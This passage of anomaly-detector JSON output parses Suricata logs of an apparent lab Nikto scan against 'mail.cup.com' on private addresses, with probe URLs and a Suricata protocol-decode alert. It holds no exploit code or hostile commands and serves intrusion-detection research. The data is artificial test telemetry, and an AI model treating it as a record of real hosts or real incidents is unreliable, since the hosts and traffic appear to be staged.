"/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46782, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":941400980622918,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 941400980622918, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.168368+0000\",\"flow_id\":941400980622918,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46782,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.types\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.types\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80", "/parser/model/time": 1583349514.16989, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46784, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.169890 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46784 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.stat", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.170041, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.stat\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.stat", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46784, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1023417676108868,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1023417676108868, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.170041+0000\",\"flow_id\":1023417676108868,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46784,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.stat\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.stat\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80", "/parser/model/time": 1583349514.171543, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46786, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.171543 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46786 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.aspx", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.171725, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":921236109171523,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.aspx\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.aspx", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46786, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":921236109171523,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 921236109171523, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.171725+0000\",\"flow_id\":921236109171523,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46786,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.aspx\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.aspx\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80", "/parser/model/time": 1583349514.17346, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46788, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.173460 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46788 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.17 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.c", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.173752+0000\",\"flow_id\":1561375214838397,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.173752, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1561375214838397,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46788,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.c\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.c\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.c\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.c", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.c", 